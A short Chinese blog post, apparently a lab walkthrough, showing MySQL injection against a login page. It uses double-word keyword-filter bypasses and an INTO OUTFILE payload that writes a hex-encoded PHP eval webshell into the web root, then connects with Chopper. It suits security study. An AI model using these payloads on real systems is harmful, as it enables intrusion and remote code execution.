首页 > 数据库 >sql注入马

sql注入马

时间:2022-12-28 10:44:46浏览次数:49  
标签:admin into ctsz1 sql null order 注入

原理:利用了数据库是能够写文件的。

 

语法:Select '文件的内容' into outfile '文件的路径'

 

select 'ctsz1' into outfile 'c:/WWW/ctsz1.txt'

 

靶场sql-注入绕过防护getshell

输入admin发现有管理员后台

正常输入显示密码不正确

后面加个单引号报错了

使用order by 探测字段长度,最终探测长度为5

order by 5

order by 6

爆数据库名时and被过滤,采用空格+双写绕过:

admin' an and d updatexml(1,concat(0x7e,select database(),0x7e),1)#

 

然后注入码

admin' uni union on selselectect null,null,null,null,0x3c3f706870206576616c28245f524551554553545b385d293f3e in into outoutfilefile 'D:/phpStudy/WWW/bees/ctsz1.php'--+

 

一句话木马:<?php eval($_REQUEST[8])?> --> 16编码(HEX转换)转换:0x3c3f706870206576616c28245f524551554553545b385d293f3e

然后用菜刀进行连接

 

发现flag 提交

标签:admin,into,ctsz1,sql,null,order,注入
From: https://www.cnblogs.com/Ctsz1/p/17009594.html

相关文章

  • mysql Event、存储过程、表命令
     Mysql事件调度器(EventScheduler)类似于定时器,可以在某一个时间点执行一个SQL语句或一个语句块(BEGIN...END);或者每隔固定间隔重复执行。类似于Linux下的crontab,或Windows......
  • mybatis批量update(mysql)
    批量插入:<insertid="batchInsert">insertintotestTable(id,content)values<foreachcollection="list"item="item"index="index"separator=",">......
  • MySql索引下推知识分享
    作者:刘邓忠Mysql是大家最常用的数据库,下面为大家带来mysql索引下推知识点的分享,以便巩固mysql基础知识,如有错误,还请各位大佬们指正。1什么是索引下推索引下推(In......
  • docker搭建Elasticsearch、Kibana、Logstash 同步mysql数据到ES
    一、前言在数据量大的企业级实践中,Elasticsearch显得非常常见,特别是数据表超过千万级后,无论怎么优化,还是有点力不从心!使用中,最首先的问题就是怎么把千万级数据同步到Elast......
  • mysql相关优化配置
    [mysqld]#mysql数据存储目录datadir=/data/mysql#socket存储socket=/tmp/mysqld.sock#当一个磁盘或分区空间不够时,可以将数据存储到其他的磁盘或分区symbolic-links=......
  • 基于KeepAlived的MySQL主主互备模式的高可用
    架构图主要设计思路是通过MySQLReplication技术将两台MySQLServer互相将对方作为自己的Master,自己又同时作为对方的Slave来进行复制。这样就实现了高可用构架中的数据......
  • Mysql数据库备份工具xtrabackup
    安装xtrabackup工具包几个percona官方yum源http://repo.percona.com/centos/https://www.percona.com/downloads/percona-release/下载yum源https://www.percona.......
  • mysql授权
     授权被授权的用户可将自己的权限副本转赠给其他用户,说白点就是将自己的权限完全复制给另一个用户 mysql>GRANTALLON*.*TO'root'@'192.168.59.129'IDENTIFIED......
  • MySQL 之 单表查询
    一.简单查询--创建表DROPTABLEIFEXISTS`person`;CREATETABLE`person`(`id`int(11)NOTNULLAUTO_INCREMENT,`name`varchar(50)NOTNULL,`age`tinyint(4)......
  • MySQL函数总结
    数学函数求绝对值函数abs()selectfweight-50,abs(fweight-50),abs(-5.23)fromt_person;求指数函数power()selectfweight,power(fweight,-0.5),power(fweight,2),pow......